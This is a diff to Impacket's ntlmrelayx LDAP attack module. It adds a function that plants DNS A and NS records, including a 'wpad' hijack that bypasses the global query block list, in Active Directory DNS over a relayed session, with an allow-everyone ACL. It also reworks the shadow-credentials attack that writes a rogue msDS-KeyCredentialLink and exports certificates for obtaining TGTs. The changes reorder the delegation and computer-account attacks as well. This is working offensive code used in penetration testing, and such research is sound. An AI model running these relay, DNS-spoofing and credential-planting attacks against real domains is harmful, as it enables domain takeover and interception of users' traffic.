@@ -1,6 +1,8 @@
 # Impacket - Collection of Python classes for working with network protocols.
 #
-# SECUREAUTH LABS. Copyright (C) 2022 SecureAuth Corporation. All rights reserved.
+# Copyright Fortra, LLC and its affiliated companies 
+#
+# All rights reserved.
 #
 # This software is provided under a slightly modified version
 # of the Apache Software License. See the accompanying LICENSE file
@@ -22,6 +24,7 @@ import datetime
 import binascii
 import codecs
 import re
+import dns.resolver
 import ldap3
 import ldapdomaindump
 from ldap3.core.results import RESULT_UNWILLING_TO_PERFORM
@@ -30,6 +33,8 @@ from ldap3.protocol.formatters.formatters import format_sid
 from ldap3.utils.conv import escape_filter_chars
 import os
 from Cryptodome.Hash import MD4
+from ipaddress import IPv4Address, AddressValueError
+from functools import partial
 
 from impacket import LOG
 from impacket.examples.ldap_shell import LdapShell
@@ -39,11 +44,7 @@ from impacket.ldap import ldaptypes
 from impacket.ldap.ldaptypes import ACCESS_ALLOWED_OBJECT_ACE, ACCESS_MASK, ACCESS_ALLOWED_ACE, ACE, OBJECTTYPE_GUID_MAP
 from impacket.uuid import string_to_bin, bin_to_string
 from impacket.structure import Structure, hexdump
-
-from dsinternals.system.Guid import Guid
-from dsinternals.common.cryptography.X509Certificate2 import X509Certificate2
-from dsinternals.system.DateTime import DateTime
-from dsinternals.common.data.hello.KeyCredential import KeyCredential
+from impacket.examples.ntlmrelayx.utils import shadow_credentials
 
 # This is new from ldap3 v2.5
 try:
@@ -115,10 +116,10 @@ class LDAPAttack(ProtocolAttack):
     GENERIC_EXECUTE         = 0x00020004
     GENERIC_ALL             = 0x000F01FF
 
-    def __init__(self, config, LDAPClient, username):
+    def __init__(self, config, LDAPClient, username, target=None, relay_client=None):
         self.computerName = '' if not config.addcomputer else config.addcomputer[0]
         self.computerPassword = '' if not config.addcomputer or len(config.addcomputer) < 2 else config.addcomputer[1]
-        ProtocolAttack.__init__(self, config, LDAPClient, username)
+        ProtocolAttack.__init__(self, config, LDAPClient, username, target, relay_client)
         if self.config.interactive:
             # Launch locally listening interactive shell.
             self.tcp_shell = TcpShell()
@@ -283,12 +284,12 @@ class LDAPAttack(ProtocolAttack):
             LOG.info("Target user found: %s" % target_dn)
 
         LOG.info("Generating certificate")
-        certificate = X509Certificate2(subject=currentShadowCredentialsTarget, keySize=2048, notBefore=(-40 * 365), notAfter=(40 * 365))
+        key,certificate = shadow_credentials.createSelfSignedX509Certificate(subject=currentShadowCredentialsTarget)
         LOG.info("Certificate generated")
         LOG.info("Generating KeyCredential")
-        keyCredential = KeyCredential.fromX509Certificate2(certificate=certificate, deviceId=Guid(), owner=target_dn, currentTime=DateTime())
-        LOG.info("KeyCredential generated with DeviceID: %s" % keyCredential.DeviceId.toFormatD())
-        LOG.debug("KeyCredential: %s" % keyCredential.toDNWithBinary().toString())
+        keyCredential = shadow_credentials.KeyCredential(key,deviceId=shadow_credentials.getDeviceId(),currentTime=shadow_credentials.getTicksNow())
+        #LOG.info("KeyCredential generated with DeviceID: %s" % keyCredential.DeviceId.toFormatD())
+        #LOG.debug("KeyCredential: %s" % keyCredential.toDNWithBinary().toString())
         self.client.search(target_dn, '(objectClass=*)', search_scope=ldap3.BASE, attributes=['SAMAccountName', 'objectSid', 'msDS-KeyCredentialLink'])
         results = None
         for entry in self.client.response:
@@ -299,7 +300,7 @@ class LDAPAttack(ProtocolAttack):
             LOG.error('Could not query target user properties')
             return
         try:
-            new_values = results['raw_attributes']['msDS-KeyCredentialLink'] + [keyCredential.toDNWithBinary().toString()]
+            new_values = results['raw_attributes']['msDS-KeyCredentialLink'] + [shadow_credentials.toDNWithBinary2String( keyCredential.dumpBinary(), target_dn )]
             LOG.info("Updating the msDS-KeyCredentialLink attribute of %s" % currentShadowCredentialsTarget)
             self.client.modify(target_dn, {'msDS-KeyCredentialLink': [ldap3.MODIFY_REPLACE, new_values]})
             if self.client.result['result'] == 0:
@@ -310,7 +311,7 @@ class LDAPAttack(ProtocolAttack):
                 else:
                     path = self.config.ShadowCredentialsOutfilePath
                 if self.config.ShadowCredentialsExportType == "PEM":
-                    certificate.ExportPEM(path_to_files=path)
+                    shadow_credentials.exportPEM(certificate,key,path_to_files=path)
                     LOG.info("Saved PEM certificate at path: %s" % path + "_cert.pem")
                     LOG.info("Saved PEM private key at path: %s" % path + "_priv.pem")
                     LOG.info("A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools")
@@ -322,7 +323,7 @@ class LDAPAttack(ProtocolAttack):
                         LOG.debug("No pass was provided. The certificate will be store with the password: %s" % password)
                     else:
                         password = self.config.ShadowCredentialsPFXPassword
-                    certificate.ExportPFX(password=password, path_to_file=path)
+                    shadow_credentials.exportPFX(certificate,key,password=password, path_to_file=path)
                     LOG.info("Saved PFX (#PKCS12) certificate & key at path: %s" % path + ".pfx")
                     LOG.info("Must be used with password: %s" % password)
                     LOG.info("A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools")
@@ -678,10 +679,12 @@ class LDAPAttack(ProtocolAttack):
 
             for ace in (a for a in sd["Dacl"]["Data"] if a["AceType"] == ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ACE_TYPE):
                 sid = format_sid(ace["Ace"]["Sid"].getData())
-                if ace["Ace"]["ObjectTypeLen"] == 0:
+                if ace["Ace"]["Flags"] == 2:
                     uuid = bin_to_string(ace["Ace"]["InheritedObjectType"]).lower()
-                else:
+                elif ace["Ace"]["Flags"] == 1:
                     uuid = bin_to_string(ace["Ace"]["ObjectType"]).lower()
+                else:
+                    continue
 
                 if not uuid in enrollment_uuids:
                     continue
@@ -712,7 +715,7 @@ class LDAPAttack(ProtocolAttack):
                     sid_map[sid] = sid
                     continue
 
-                if not len(self.client.response):
+                if not len(self.client.entries):
                     sid_map[sid] = sid
                 else:
                     sid_map[sid] = domain_fqdn + "\\" + self.client.response[0]["attributes"]["name"]
@@ -772,6 +775,135 @@ class LDAPAttack(ProtocolAttack):
                      ", ".join(("`" + sid_map[principal] + "`" for principal in enrollment_principals))))
 
 
+    def addDnsRecord(self, name, ipaddr):
+        # https://github.com/Kevin-Robertson/Powermad/blob/master/Powermad.ps1
+        def new_dns_namearray(data):
+            index_array = [pos for pos, char in enumerate(data) if char == '.']
+            name_array = bytearray()
+            if len(index_array) > 0:
+                name_start = 0
+                for index in index_array:
+                    name_end = index - name_start
+                    name_array.append(name_end)
+                    name_array.extend(data[name_start:name_end+name_start].encode("utf8"))
+                    name_start = index + 1
+                name_array.append(len(data) - name_start)
+                name_array.extend(data[name_start:].encode("utf8"))
+            else:
+                name_array.append(len(data))
+                name_array.extend(data.encode("utf8"))
+            return name_array
+
+        def new_dns_record(data, type):
+            if type == "A":
+                addr_data = data.split('.')
+                dns_type = bytearray((0x1, 0x0))
+                dns_length = int_to_4_bytes(len(addr_data))[0:2]
+                dns_data = bytearray(map(int, addr_data))
+            elif type == "NS":
+                dns_type = bytearray((0x2, 0x0))
+                dns_length = int_to_4_bytes(len(data) + 4)[0:2]
+                dns_data = bytearray()
+                dns_data.append(len(data) + 2)
+                dns_data.append(len(data.split(".")))
+                dns_data.extend(new_dns_namearray(data))
+                dns_data.append(0)
+            else:
+                return False
+
+            dns_ttl = bytearray(reversed(int_to_4_bytes(60)))
+            dns_record = bytearray(dns_length)
+            dns_record.extend(dns_type)
+            dns_record.extend(bytearray((0x05, 0xF0, 0x00, 0x00)))
+            dns_record.extend(int_to_4_bytes(get_next_serial_p()))
+            dns_record.extend(dns_ttl)
+            dns_record.extend((0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00))
+            dns_record.extend(dns_data)
+            return dns_record
+
+        def int_to_4_bytes(num):
+            arr = bytearray()
+            for i in range(4):
+                arr.append(num & 0xff)
+                num >>= 8
+            return arr
+
+        # https://github.com/dirkjanm/krbrelayx/blob/master/dnstool.py
+        def get_next_serial(server, zone):
+            dnsresolver = dns.resolver.Resolver()
+            dnsresolver.nameservers = [server]
+            res = dnsresolver.resolve(zone, 'SOA',tcp=True)
+            for answer in res:
+                return answer.serial + 1
+
+        try:
+            dns_naming_context = next((nc for nc in self.client.server.info.naming_contexts if "domaindnszones" in nc.lower()))
+        except StopIteration:
+            LOG.error('Could not find DNS naming context, aborting')
+            return
+
+        domaindn = self.client.server.info.other['defaultNamingContext'][0]
+        domain = re.sub(',DC=', '.', domaindn[domaindn.find('DC='):], flags=re.I)[3:]
+        dns_base_dn = 'DC=%s,CN=MicrosoftDNS,%s' % (domain, dns_naming_context)
+
+        get_next_serial_p = partial(get_next_serial, self.client.server.address_info[0][4][0], domain)
+
+        LOG.info('Checking if domain already has a `%s` DNS record' % name)
+        if self.client.search(dns_base_dn, '(name=%s)' % escape_filter_chars(name), search_scope=ldap3.LEVEL):
+            LOG.error('Domain already has a `%s` DNS record, aborting' % name)
+            return
+
+        LOG.info('Domain does not have a `%s` record!' % name)
+
+        ACL_ALLOW_EVERYONE_EVERYTHING = b'\x01\x00\x04\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x02\x000\x00\x02\x00\x00\x00\x00\x00\x14\x00\xff\x01\x0f\x00\x01\x01\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\n\x14\x00\x00\x00\x00\x10\x01\x01\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00'
+
+        a_record_name = name
+        is_name_wpad = (a_record_name.lower() == 'wpad')
+
+        if is_name_wpad:
+            LOG.info('To add the `wpad` name, we need to bypass the GQBL: we\'ll first add a random `A` name and then add `wpad` as `NS` pointing to that name')
+            a_record_name = ''.join(random.choice(string.ascii_lowercase) for _ in range(12))
+
+        # First add an A record pointing to the provided IP
+        a_record_dn = 'DC=%s,%s' % (a_record_name, dns_base_dn)
+        a_record_data = {
+            'dnsRecord': new_dns_record(ipaddr, "A"),
+            'objectCategory': 'CN=Dns-Node,%s' % self.client.server.info.other['schemaNamingContext'][0],
+            'dNSTombstoned': False,
+            'name': a_record_name,
+            'nTSecurityDescriptor': ACL_ALLOW_EVERYONE_EVERYTHING,
+        }
+
+        LOG.info('Adding `A` record `%s` pointing to `%s` at `%s`' % (a_record_name, ipaddr, a_record_dn))
+        if not self.client.add(a_record_dn, ['top', 'dnsNode'], a_record_data):
+            LOG.error('Failed to add `A` record: %s' % str(self.client.result))
+            return
+
+        LOG.info('Added `A` record `%s`. DON\'T FORGET TO CLEANUP (set `dNSTombstoned` to `TRUE`, set `dnsRecord` to a NULL byte)' % a_record_name)
+
+        if not is_name_wpad:
+            return
+
+        # Then add the wpad NS record
+        ns_record_name = 'wpad'
+        ns_record_dn = 'DC=%s,%s' % (ns_record_name, dns_base_dn)
+        ns_record_value = a_record_name + "." + domain
+        ns_record_data = {
+            'dnsRecord': new_dns_record(ns_record_value, "NS"),
+            'objectCategory': 'CN=Dns-Node,%s' % self.client.server.info.other['schemaNamingContext'][0],
+            'dNSTombstoned': False,
+            'name': ns_record_name,
+            'nTSecurityDescriptor': ACL_ALLOW_EVERYONE_EVERYTHING,
+        }
+
+        LOG.info('Adding `NS` record `%s` pointing to `%s` at `%s`' % (ns_record_name, ns_record_value, ns_record_dn))
+        if not self.client.add(ns_record_dn, ['top', 'dnsNode'], ns_record_data):
+            LOG.error('Failed to add `NS` record `wpad`: %s' % str(self.client.result))
+            return
+
+        LOG.info('Added `NS` record `%s`. DON\'T FORGET TO CLEANUP (set `dNSTombstoned` to `TRUE`, set `dnsRecord` to a NULL byte)' % ns_record_name)
+
+
     def run(self):
         #self.client.search('dc=vulnerable,dc=contoso,dc=com', '(objectclass=person)')
         #print self.client.entries
@@ -788,7 +920,7 @@ class LDAPAttack(ProtocolAttack):
 
         if self.config.interactive:
             if self.tcp_shell is not None:
-                LOG.info('Started interactive Ldap shell via TCP on 127.0.0.1:%d' % self.tcp_shell.port)
+                LOG.info('Started interactive Ldap shell via TCP on 127.0.0.1:%d as %s/%s' % (self.tcp_shell.port, self.domain, self.username))
                 # Start listening and launch interactive shell.
                 self.tcp_shell.listen()
                 ldap_shell = LdapShell(self.tcp_shell, domainDumper, self.client)
@@ -952,10 +1084,26 @@ class LDAPAttack(ProtocolAttack):
             self.dumpADCS()
             LOG.info("Done dumping ADCS info")
 
-        # Perform the Delegate attack if it is enabled and we relayed a computer account
-        if self.config.delegateaccess and self.username[-1] == '$':
-            self.delegateAttack(self.config.escalateuser, self.username, domainDumper, self.config.sid)
-            return
+        if self.config.adddnsrecord:
+            name = self.config.adddnsrecord[0]
+            ipaddr = self.config.adddnsrecord[1]
+
+            dns_name_ok = True
+            dns_ipaddr_ok = True
+
+            # DNS name can either be a wildcard or just contain alphanum and hyphen
+            if (name != '*') and (re.search(r'[^0-9a-z-]', name, re.I)):
+                LOG.error("Invalid name for DNS record")
+                dns_name_ok = False
+
+            try:
+                IPv4Address(ipaddr)
+            except AddressValueError:
+                LOG.error("Invalid IPv4 for DNS record")
+                dns_ipaddr_ok = False
+
+            if dns_name_ok and dns_ipaddr_ok:
+                self.addDnsRecord(name, ipaddr)
 
         # Add a new computer if that is requested
         # privileges required are not yet enumerated, neither is ms-ds-MachineAccountQuota
@@ -969,8 +1117,12 @@ class LDAPAttack(ProtocolAttack):
             ][0]
             LOG.debug("Computer container is {}".format(computerscontainer))
             self.addComputer(computerscontainer, domainDumper)
-            return
 
+        # Perform the Delegate attack if it is enabled and we relayed a computer account
+        if self.config.delegateaccess and self.username[-1] == '$':
+            self.delegateAttack(self.config.escalateuser, self.username, domainDumper, self.config.sid)
+            return
+        
         # Perform the Shadow Credentials attack if it is enabled
         if self.config.IsShadowCredentialsAttack:
             self.shadowCredentialsAttack(domainDumper)
